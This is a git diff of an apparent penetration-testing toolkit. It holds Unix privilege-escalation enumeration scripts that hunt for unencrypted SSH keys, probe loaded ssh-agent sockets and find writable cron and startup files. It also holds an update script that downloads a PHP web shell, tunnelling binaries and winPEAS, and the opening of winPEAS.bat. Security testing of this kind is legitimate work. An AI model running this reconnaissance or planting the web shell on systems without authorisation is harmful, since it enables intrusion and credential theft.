-fi - -section "Checking postgres trust relationships" -for DIR in $PGDIRS; do - if [ -d "$DIR" ] && [ -r "$DIR/pg_hba.conf" ]; then - grep -v '^#' "$DIR/pg_hba.conf" | grep -v '^[ \t]*$' | while read LINE - do - AUTH=`echo "$LINE" | awk '{print $NF}'` - if [ "$AUTH" = "trust" ]; then - PGTRUST=1 - echo "WARNING: Postgres trust configured in $DIR/pg_hba.conf: $LINE" - fi - done - fi -done - -PGVER1=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version` - -if [ -n "$PGVER1" ]; then - PGTRUST=1 - echo "WARNING: Can connect to local postgres database as \"postgres\" without a password" -fi - -PGVER2=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version` - -if [ -n "$PGVER2" ]; then - PGTRUST=1 - echo "WARNING: Can connect to local postgres database as \"pgsql\" without a password" -fi - -if [ -z "$PGTRUST" ]; then - echo "No postgres trusts detected" -fi - -# Check device files for mounted file systems are secure -# cat /proc/mounts | while read LINE # Doesn't work so well when LVM is used - need to be root -section "Checking permissions on device files for mounted partitions" -if [ "$OS" = "linux" ]; then - mount | while read LINE + header + preamble + printf "Usage: ${0}\n" + printf "\n" + printf "\t--help\tdisplay this help and exit\n" + printf "\t--version\tdisplay version and exit\n" + printf "\t--color\tenable output coloring\n" + printf "\t--verbose\tverbose level (0-2, default: 1)\n" + printf "\t--type\tselect from one of the following check types:\n" + for checktype in lib/checks/enabled/* do - DEVICE=`echo "$LINE" | awk '{print $1}'` - FS=`echo "$LINE" | awk '{print $5}'` - if [ "$FS" = "ext2" ] || [ "$FS" = "ext3" ] ||[ "$FS" = "reiserfs" ]; then - echo "Checking device $DEVICE" - check_perms "$DEVICE is a mounted file system." 
$DEVICE root - fi + printf "\t\t`basename ${checktype}`\n" done -elif [ "$OS" = "bsd" ]; then - mount | grep ufs | while read LINE + printf "\t--checks\tprovide a comma separated list of checks to run, select from the following checks:\n" + for check in lib/checks/* do - DEVICE=`echo "$LINE" | awk '{print $1}'` - echo "Checking device $DEVICE" - check_perms "$DEVICE is a mounted file system." $DEVICE root - done -elif [ "$OS" = "solaris" ]; then - mount | grep xattr | while read LINE - do - DEVICE=`echo "$LINE" | awk '{print $3}'` - if [ ! "$DEVICE" = "swap" ]; then - echo "Checking device $DEVICE" - check_perms "$DEVICE is a mounted file system." $DEVICE root - fi - done -elif [ "$OS" = "hpux" ]; then - mount | while read LINE - do - DEVICE=`echo "$LINE" | awk '{print $3}'` - C=`echo $DEVICE | cut -c 1` - if [ "$C" = "/" ]; then - echo "Checking device $DEVICE" - check_perms "$DEVICE is a mounted file system." $DEVICE root + if [ "`basename \"${check}\"`" != "enabled" ] + then + printf "\t\t`basename ${check}`\n" fi done + exit 1 +} - NFS=`mount | grep NFS` - if [ -n "$NFS" ]; then - echo "WARNING: This system is an NFS client. Check for nosuid and nodev options." 
- mount | grep NFS - fi -fi - -# Check cron jobs if they're readable -# TODO check that cron is actually running -section "Checking cron job programs aren't writable (/etc/crontab)" -CRONDIRS="" -if [ -f "/etc/crontab" ] && [ -r "/etc/crontab" ]; then - MYPATH=`grep '^PATH=' /etc/crontab | cut -f 2 -d = ` - echo Crontab path is $MYPATH - - # Check if /etc/cron.(hourly|daily|weekly|monthly) are being used - CRONDIRS=`grep -v '^#' /etc/crontab | grep -v '^[ \t]*$' | grep '[ \t][^ \t][^ \t]*[ \t][ \t]*' | grep run-crons` - - # Process run-parts - grep -v '^#' /etc/crontab | grep -v '^[ \t]*$' | grep '[ \t][^ \t][^ \t]*[ \t][ \t]*' | grep run-parts | while read LINE - do - echo "Processing crontab run-parts entry: $LINE" - USER=`echo "$LINE" | awk '{print $6}'` - DIR=`echo "$LINE" | sed 's/.*run-parts[^()&|;\/]*\(\/[^ ]*\).*/\1/'` - check_perms "$DIR holds cron jobs which are run as $USER." "$DIR" "$USER" - if [ -d "$DIR" ]; then - echo " Checking directory: $DIR" - for FILE in $DIR/*; do - FILENAME=`echo "$FILE" | sed 's/.*\///'` - if [ "$FILENAME" = "*" ]; then - echo " No files in this directory." - continue - fi - check_called_programs "$FILE is run by cron as $USER." "$FILE" "$USER" - done - fi - done - - # TODO bsd'd periodic: - # 1 3 * * * root periodic daily - # 15 4 * * 6 root periodic weekly - # 30 5 1 * * root periodic monthly - - grep -v '^#' /etc/crontab | grep -v '^[ ]*$' | grep '[ ][^ ][^ ]*[ ][ ]*' | while read LINE - do - echo "Processing crontab entry: $LINE" - USER=`echo "$LINE" | awk '{print $6}'` - PROG=`echo "$LINE" | awk '{print $7}'` - check_called_programs "$PROG is run from crontab as $USER." $PROG $USER $MYPATH - done -else - echo "File /etc/crontab not present. Skipping checks." 
-fi - -# Do this if run-crons is run from /etc/crontab -if [ -n "$CRONDIRS" ]; then - USER=`echo "$CRONDIRS" | awk '{print $6}'` - section "Checking /etc/cron.(hourly|daily|weekly|monthly)" - for DIR in hourly daily weekly monthly; do - if [ -d "/etc/cron.$DIR" ]; then - echo " Checking directory: /etc/cron.$DIR" - for FILE in /etc/cron.$DIR/*; do - FILENAME=`echo "$FILE" | sed 's/.*\///'` - if [ "$FILENAME" = "*" ]; then - echo "No files in this directory." - continue - fi - check_called_programs "$FILE is run via cron as $USER." "$FILE" $USER - done - fi - done -fi - -section "Checking cron job programs aren't writable (/var/spool/cron/crontabs)" -if [ -d "/var/spool/cron/crontabs" ]; then - for FILE in /var/spool/cron/crontabs/*; do - USER=`echo "$FILE" | sed 's/^.*\///'` - if [ "$USER" = "*" ]; then - echo "No user crontabs found in /var/spool/cron/crontabs. Skipping checks." - continue - fi - echo "Processing crontab for $USER: $FILE" - if [ -r "$FILE" ]; then - MYPATH=`grep '^PATH=' "$FILE" | cut -f 2 -d = ` - if [ -n "$MYPATH" ]; then - echo Crontab path is $MYPATH - fi - grep -v '^#' "$FILE" | grep -v '^[ \t]*$' | grep '[ \t][^ \t][^ \t]*[ \t][ \t]*' | while read LINE - do - echo "Processing crontab entry: $LINE" - PROG=`echo "$LINE" | awk '{print $6}'` - check_called_programs "$PROG is run via cron as $USER." "$PROG" $USER - done - else - echo "ERROR: Can't read file $FILE" - fi - done -else - echo "Directory /var/spool/cron/crontabs is not present. Skipping checks." -fi - -section "Checking cron job programs aren't writable (/var/spool/cron/tabs)" -if [ -d "/var/spool/cron/tabs" ]; then - for FILE in /var/spool/cron/tabs/*; do - USER=`echo "$FILE" | sed 's/^.*\///'` - if [ "$USER" = "*" ]; then - echo "No user crontabs found in /var/spool/cron/crontabs. Skipping checks." 
- continue - fi - echo "Processing crontab for $USER: $FILE" - if [ -r "$FILE" ]; then - MYPATH=`grep '^PATH=' "$FILE" | cut -f 2 -d = ` - if [ -n "$MYPATH" ]; then - echo Crontab path is $MYPATH - fi - grep -v '^#' "$FILE" | grep -v '^[ \t]*$' | grep '[ \t][^ \t][^ \t]*[ \t][ \t]*' | while read LINE - do - echo "Processing crontab entry: $LINE" - PROG=`echo "$LINE" | awk '{print $6}'` - check_called_programs "$PROG is run from cron as $USER." $PROG $USER $MYPATH - done - else - echo "ERROR: Can't read file $FILE" - fi - done -else - echo "Directory /var/spool/cron/tabs is not present. Skipping checks." -fi - -# Check programs run from /etc/inetd.conf have secure permissions -# TODO: check inetd is actually running -section "Checking inetd programs aren't writable" -if [ -f /etc/inetd.conf ] && [ -r /etc/inetd.conf ]; then - grep -v '^#' /etc/inetd.conf | grep -v '^[ \t]*$' | while read LINE - do - USER=`echo $LINE | awk '{print $5}'` - PROG=`echo $LINE | awk '{print $6}'` # could be tcpwappers ... - PROG2=`echo $LINE | awk '{print $7}'` # ... and this is the real prog - if [ -z "$PROG" ] || [ "$PROG" = "internal" ]; then - # Not calling an external program - continue - fi - echo Processing inetd line: $LINE - if [ -f "$PROG" ]; then - check_called_programs "$PROG is run from inetd as $USER." $PROG $USER - fi - if [ -f "$PROG2" ]; then - check_called_programs "$PROG is run from inetd as $USER." $PROG2 $USER - fi - done -else - echo "File /etc/inetd.conf not present. Skipping checks." 
-fi - -# Check programs run from /etc/xinetd.d/* -# TODO: check xinetd is actually running -section "Checking xinetd programs aren't writeable" -if [ -d /etc/xinetd.d ]; then - for FILE in `grep 'disable[ \t]*=[ \t]*no' /etc/xinetd.d/* | cut -f 1 -d :`; do - echo Processing xinetd service file: $FILE - PROG=`grep '^[ \t]*server[ \t]*=[ \t]*' $FILE | sed 's/.*server.*=[ \t]*//'` - USER=`grep '^[ \t]*user[ \t]*=[ \t]*' $FILE | sed 's/.*user.*=[ \t]*//'` - check_called_programs "$PROG is run from xinetd as $USER." $PROG $USER - done -else - echo "Directory /etc/xinetd.d not present. Skipping checks." -fi - -# Check for writable home directories -section "Checking home directories aren't writable" -cat /etc/passwd | grep -v '^#' | while read LINE +# TODO make it use lib/misc/validate +CHECKS="" +TYPE="all" +COLORING="0" +VERBOSE="1" +while [ -n "${1}" ] do - echo Processing /etc/passwd line: $LINE - USER=`echo $LINE | cut -f 1 -d :` - DIR=`echo $LINE | cut -f 6 -d :` - SHELL=`echo $LINE | cut -f 7 -d :` - if [ "$SHELL" = "/sbin/nologin" ] || [ "$SHELL" = "/bin/false" ]; then - echo " Skipping user $USER. They don't have a shell." - else - if [ "$DIR" = "/dev/null" ]; then - echo " Skipping /dev/null home directory" + case "${1}" in + --help|-h) + usage + ;; + --version|-v|-V) + version + ;; + --color) + COLORING="1" + ;; + --verbose) + shift + VERBOSE="${1}" + ;; + --type|-t) + shift + TYPE="${1}" + ;; + --checks|-c) + shift + CHECKS="${1}" + ;; + esac + shift +done +header +if [ "${VERBOSE}" != "0" -a "${VERBOSE}" != "1" -a "${VERBOSE}" != "2" ] +then + stdio_message_error "upc" "the provided verbose level ${VERBOSE} is invalid - use 0, 1 or 2 next time" + VERBOSE="1" +fi +if [ -n "${CHECKS}" ] +then + for checkfilename in `printf "${CHECKS}" | tr -d " " | tr "," " "` + do + if [ ! -e "lib/checks/${checkfilename}" ] + then + stdio_message_error "upc" "the provided check name '${checkfilename}' does not exist" else - check_perms "$DIR is the home directory of $USER." 
$DIR $USER - fi - fi -done - -# Check for readable files in home directories -section "Checking for readable sensitive files in home directories" -cat /etc/passwd | while read LINE -do - USER=`echo $LINE | cut -f 1 -d :` - DIR=`echo $LINE | cut -f 6 -d :` - SHELL=`echo $LINE | cut -f 7 -d :` - for FILE in $HOME_DIR_FILES; do - if [ -f "$DIR/$FILE" ]; then - check_read_perms "$DIR/$FILE is in the home directory of $USER." "$DIR/$FILE" $USER - fi - done -done - -section "Checking SUID programs" -if [ "$MODE" = "detailed" ]; then - for FILE in `find / -type f -perm -04000 2>/dev/null`; do - check_called_programs_suid $FILE - done -else - echo "Skipping checks of SUID programs (it's slow!). Run again in 'detailed' mode." -fi - -# Check for private SSH keys in home directories -section "Checking for Private SSH Keys home directories" -for HOMEDIR in `cut -f 6 -d : /etc/passwd`; do - if [ -d "$HOMEDIR/.ssh" ]; then - PRIV_KEYS=`grep -l 'BEGIN [RD]SA PRIVATE KEY' $HOMEDIR/.ssh/* 2>/dev/null` - if [ -n "$PRIV_KEYS" ]; then - for KEY in $PRIV_KEYS; do - ENC_KEY=`grep -l 'ENCRYPTED' "$KEY" 2>/dev/null` - if [ -n "$ENC_KEY" ]; then - echo "WARNING: Encrypted Private SSH Key Found in $KEY" - else - echo "WARNING: Unencrypted Private SSH Key Found in $KEY" - fi - done - fi - fi -done - -# Check for public SSH keys in home directories -section "Checking for Public SSH Keys home directories" -for HOMEDIR in `cut -f 6 -d : /etc/passwd`; do - if [ -r "$HOMEDIR/.ssh/authorized_keys" ]; then - KEYS=`grep '^ssh-' $HOMEDIR/.ssh/authorized_keys 2>/dev/null` - if [ -n "$KEYS" ]; then - echo "WARNING: Public SSH Key Found in $HOMEDIR/.ssh/authorized_keys" - fi - fi -done - -# Check for any SSH agents running on the box -section "Checking for SSH agents" -AGENTS=`ps -ef | grep ssh-agent | grep -v grep` -if [ -n "$AGENTS" ]; then - echo "WARNING: There are SSH agents running on this system:" - ps -ef | grep ssh-agent | grep -v grep - # for PID in `ps aux | grep ssh-agent | grep -v grep | 
awk '{print $2}'`; do - for SOCK in `ls /tmp/ssh-*/agent.* 2>/dev/null`; do - SSH_AUTH_SOCK=$SOCK; export SSH_AUTH_SOCK - AGENT_KEYS=`ssh-add -l | grep -v 'agent has no identities.' 2>/dev/null` - if [ -n "$AGENT_KEYS" ]; then - echo "WARNING: SSH Agent has keys loaded [SSH_AUTH_SOCK=$SSH_AUTH_SOCK]" - ssh-add -l + . "lib/checks/${checkfilename}" + `basename "${checkfilename}"`_init + `basename "${checkfilename}"`_main + `basename "${checkfilename}"`_fini fi done else - echo "No SSH agents found" -fi - -# Check for any GPG agents running on the box -section "Checking for GPG agents" -AGENTS=`ps -ef | grep gpg-agent | grep -v grep` -if [ -n "$AGENTS" ]; then - echo "WARNING: There are GPG agents running on this system:" - ps aux | grep gpg-agent | grep -v grep -else - echo "No GPG agents found" -fi - -# Check files in /etc/init.d/* can't be modified by non-root users -section "Checking startup files (init.d / rc.d) aren't writable" -for DIR in /etc/init.d /etc/rc.d /usr/local/etc/rc.d; do - if [ -d "$DIR" ]; then - for FILE in $DIR/*; do - F=`echo "$FILE" | sed 's/^.*\///'` - if [ "$F" = "*" ]; then - echo "No user startup script found in $DIR. Skipping checks." - continue - fi - echo Processing startup script $FILE - check_called_programs "$FILE is run by root at startup." $FILE root + if [ ! -d "lib/checks/enabled/${TYPE}" ] + then + stdio_message_error "upc" "the provided check type '${TYPE}' does not exist" + else + for checkfilename in lib/checks/enabled/${TYPE}/* + do + . "${checkfilename}" + `basename "${checkfilename}"`_init + `basename "${checkfilename}"`_main + `basename "${checkfilename}"`_fini done fi -done - -section "Checking if running programs are writable" -if [ $OS = "solaris" ]; then - # use the output of ps command - ps -ef -o user,comm | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - PROG=`echo "$LINE" | awk '{print $2}'` - check_called_programs "$PROG is currently running as $USER." 
"$PROG" "$USER" - done -elif [ $OS = "bsd" ]; then - # use the output of ps command - ps aux | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - PROG=`echo "$LINE" | awk '{print $11}'` - check_called_programs "$PROG is currently running as $USER." "$PROG" "$USER" - done -elif [ $OS = "hpux" ]; then - # use the output of ps command - ps -ef | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - PROG1=`echo "$LINE" | awk '{print $8}'` - PROG2=`echo "$LINE" | awk '{print $9}'` - if [ -f "$PROG1" ]; then - check_called_programs "$PROG is currently running as $USER." "$PROG1" "$USER" - fi - if [ -f "$PROG2" ]; then - check_called_programs "$PROG is currently running as $USER." "$PROG2" "$USER" - fi - done -elif [ $OS = "linux" ]; then - # use the /proc file system - for PROCDIR in /proc/[0-9]*; do - unset PROGPATH - PID=`echo $PROCDIR | cut -f 3 -d /` - echo ------------------------ - echo "PID: $PID" - if [ -d "$PROCDIR" ]; then - if [ -r "$PROCDIR/exe" ]; then - PROGPATH=`ls -l "$PROCDIR/exe" 2>&1 | sed 's/ (deleted)//' | awk '{print $NF}'` - else - if [ -r "$PROCDIR/cmdline" ]; then - P=`cat $PROCDIR/cmdline | tr "\0" = | cut -f 1 -d = | grep '^/'` - if [ -z "$P" ]; then - echo "ERROR: Can't find full path of running program: "`cat $PROCDIR/cmdline` - else - PROGPATH=$P - fi - else - echo "ERROR: Can't find full path of running program: "`cat $PROCDIR/cmdline` - continue - fi - fi - get_owner $PROCDIR; OWNER=$GET_OWNER_RETURN - echo "Owner: $OWNER" - else - echo "ERROR: Can't find OWNER. Process has gone." - continue - fi - - if [ -n "$PROGPATH" ]; then - get_owner $PROGPATH; PROGOWNER=$GET_OWNER_RETURN - echo "Program path: $PROGPATH" - check_called_programs "$PROGPATH is currently running as $OWNER." 
$PROGPATH $OWNER - fi - - if [ "$MODE" == "detailed" ]; then - for FILE in $PROCDIR/fd/*; do - F=`echo "$FILE" | sed 's/^.*\///'` - if [ "$F" = "*" ]; then - continue - fi - check_perms "$FILE is an open file descriptor for process $PID running as $OWNER." $FILE $OWNER - done - fi - done fi +exit 0 diff --git a/update.sh b/update.sh new file mode 100755 index 0000000..91730ac --- /dev/null +++ b/update.sh 
@@ -0,0 +1,38 @@
+#!/bin/bash
+
+echo "Updating scripts…"
+wget --no-verbose https://raw.githubusercontent.com/initstring/uptux/master/uptux.py -O uptux.py
+wget --no-verbose https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh -O unix-privesc-check.sh
+wget --no-verbose https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64 -O pspy64
+wget --no-verbose https://github.com/DominicBreuker/pspy/releases/latest/download/pspy32 -O pspy
+wget --no-verbose https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O p0wny-shell.php
+wget --no-verbose https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh -O lse.sh
+wget --no-verbose https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O linux-exploit-suggester.sh
+wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/linpeas.sh -O linpeas.sh
+wget --no-verbose https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh -O LinEnum.sh
+wget --no-verbose https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O deepce.sh
+
+echo "Updating autorecon…"
+wget --no-verbose https://raw.githubusercontent.com/Tib3rius/AutoRecon/master/src/autorecon/autorecon.py -O autorecon.py
+wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/global-patterns-default.toml -O autorecon_config/global-patterns.toml
+wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/port-scan-profiles-default.toml -O autorecon_config/port-scan-profiles.toml
+wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/service-scans-default.toml -O autorecon_config/service-scans.toml
+
+echo "Updating Chisel…"
+location=$(curl -s -I https://github.com/jpillora/chisel/releases/latest | grep -i "location: " | awk '{ print $2 }')
+if [[ "$location" =~ 
^https://github.com/jpillora/chisel/releases/tag/v(.*) ]]; then
+ chisel_version=${BASH_REMATCH[1]}
+ chisel_version=${chisel_version%%[[:space:]]}
+ curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz" | gzip -d > chisel
+ curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz" | gzip -d > chisel64
+ curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_386.gz" | gzip -d > win/chisel.exe
+ curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_amd64.gz" | gzip -d > win/chisel64.exe
+fi
+
+# TODO: add others
+echo "Updating windows tools…"
+wget --no-verbose https://live.sysinternals.com/accesschk.exe -O win/accesschk.exe
+wget --no-verbose https://live.sysinternals.com/accesschk64.exe -O win/accesschk64.exe
+wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe -O win/winPEAS.exe
+wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe -O win/winPEASx64.exe
+wget --no-verbose https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat -O win/winPEAS.bat
diff --git a/win/chisel.exe b/win/chisel.exe
index c5c05e5..b8b3d97 100644
Binary files a/win/chisel.exe and b/win/chisel.exe differ
diff --git a/win/chisel64.exe b/win/chisel64.exe
index 9c47167..918ae09 100644
Binary files a/win/chisel64.exe and b/win/chisel64.exe differ
diff --git a/win/winPEAS.bat b/win/winPEAS.bat
index 9af6415..da25cd4 100644
--- a/win/winPEAS.bat
+++ b/win/winPEAS.bat
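Review bot: Every fetch in this hunk runs unchecked, so a failed download is invisible and leaves a damaged tool in the tree — `wget -O` truncates the target before the transfer starts, and `curl -s -L … | gzip -d > chisel` writes whatever arrives, with `-s` hiding HTTP errors and no `-f` to fail on them (the old `win/winPEAS.bat` being replaced in the next file section, which held a wget log instead of the script, shows how such a failure ends up committed). Add `set -euo pipefail` after the shebang and use `curl -fsSL` in the four chisel lines so a 404 or an interrupted transfer aborts the run instead of overwriting a working file with an empty or truncated one. The sources are also all mutable refs (`master`, `main`, `releases/latest`), so the vendored set is whatever those branches held at run time; pinning each tool to a release tag and comparing a sha256 recorded in the repo before moving the file into place would make the update reproducible and make an unexpected upstream change visible at refresh time. `… pspy32 -O pspy` drops the architecture suffix that the sibling `pspy64` line keeps; `-O pspy32` would be consistent.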
@@ -1,12 +1,654 @@ ---2021-05-03 18:13:46-- https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat -CA-Zertifikat »/etc/ssl/certs/ca-certificates.crt« wurde geladen -Auflösen des Hostnamens raw.githubusercontent.com (raw.githubusercontent.com)… 185.199.111.133, 185.199.110.133, 185.199.109.133, ... -Verbindungsaufbau zu raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443 … verbunden. -HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK -Länge: 35107 (34K) [text/plain] -Wird in »winPEAS.bat.1« gespeichert. +@ECHO OFF & SETLOCAL EnableDelayedExpansion +TITLE WinPEAS - Windows local Privilege Escalation Awesome Script +COLOR 0F +CALL :SetOnce - 0K .......... .......... .......... .... 100% 13,2M=0,003s +REM :: WinPEAS - Windows local Privilege Escalation Awesome Script +REM :: Code by carlospolop; Re-Write by ThisLimn0 -2021-05-03 18:13:46 (13,2 MB/s) - »winPEAS.bat.1« gespeichert [35107/35107] +REM Registry scan of other drives besides +REM /////true or false +SET long=false +:Splash +ECHO. +CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m" +CALL :ColorLine " %E%32m,/*,..*(((((((((((((((((((((((((((((((((,%E%97m" +CALL :ColorLine " %E%32m,*/((((((((((((((((((/, %E%92m.*//((//**,%E%32m .*((((((*%E%97m" +CALL :ColorLine " %E%32m((((((((((((((((* %E%94m*****%E%32m,,,/########## %E%32m.(* ,((((((%E%97m" +CALL :ColorLine " %E%32m(((((((((((/* %E%94m******************%E%32m/####### %E%32m.(. 
((((((%E%97m" +CALL :ColorLine " %E%32m((((((.%E%92m.%E%94m******************%E%97m/@@@@@/%E%94m***%E%92m/######%E%32m /((((((%E%97m" +CALL :ColorLine " %E%32m,,.%E%92m.%E%94m**********************%E%97m@@@@@@@@@@(%E%94m***%E%92m,####%E%32m ../(((((%E%97m" +CALL :ColorLine " %E%32m, ,%E%92m%E%94m**********************%E%97m#@@@@@#@@@@%E%94m*********%E%92m##%E%32m((/ /((((%E%97m" +CALL :ColorLine " %E%32m..((%E%92m(##########%E%94m*********%E%97m/#@@@@@@@@@/%E%94m*************%E%32m,,..((((%E%97m" +CALL :ColorLine " %E%32m.((%E%92m(################(/%E%94m******%E%97m/@@@@@#%E%94m****************%E%32m.. /((%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(########################(/%E%94m************************%E%32m..*(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(#############################(/%E%94m********************%E%32m.,(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(##################################(/%E%94m***************%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######################################(%E%94m************%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######(,.***.,(###################(..***(/%E%94m*********%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######*(#####((##################((######/(%E%94m********%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(##################(/**********(################(%E%94m**%E%32m...(%E%97m" +CALL :ColorLine " %E%32m.((%E%92m(####################/*******(###################%E%32m.((((%E%97m" +CALL :ColorLine " %E%32m.((((%E%92m(############################################/%E%32m /((%E%97m" +CALL :ColorLine " %E%32m..((((%E%92m(#########################################(%E%32m..(((((.%E%97m" +CALL :ColorLine " %E%32m....((((%E%92m(#####################################(%E%32m .((((((.%E%97m" +CALL :ColorLine " %E%32m......((((%E%92m(#################################(%E%32m .(((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((. 
,%E%92m(############################(%E%32m../(((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" +ECHO. by carlospolop +ECHO. +ECHO. + +:Advisory +REM // Increase progress in title by n percent +CALL :T_Progress 0 +ECHO./^^!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script +CALL :ColorLine " %E%41mWinPEAS should be used for authorized penetration testing and/or educational purposes only.%E%40;97m" +CALL :ColorLine " %E%41mAny misuse of this software will not be the responsibility of the author or of any other collaborator.%E%40;97m" +CALL :ColorLine " %E%41mUse it at your own networks and/or with the network owner's permission.%E%40;97m" +ECHO. + +:SystemInfo +CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO +CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" +ECHO. [i] Check for vulnerabilities for the OS version with the applied patches +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits +systeminfo +ECHO. +CALL :T_Progress 2 + +:ListHotFixes +wmic qfe get Caption,Description,HotFixID,InstalledOn | more +set expl=no +for /f "tokens=3-9" %%a in ('systeminfo') do (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes) +IF "%expl%" == "yes" ECHO. [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-080 patch is NOT installed! 
(Vulns: XP/SP3,2K3/SP3-afd.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-015 patch is NOT installed! 
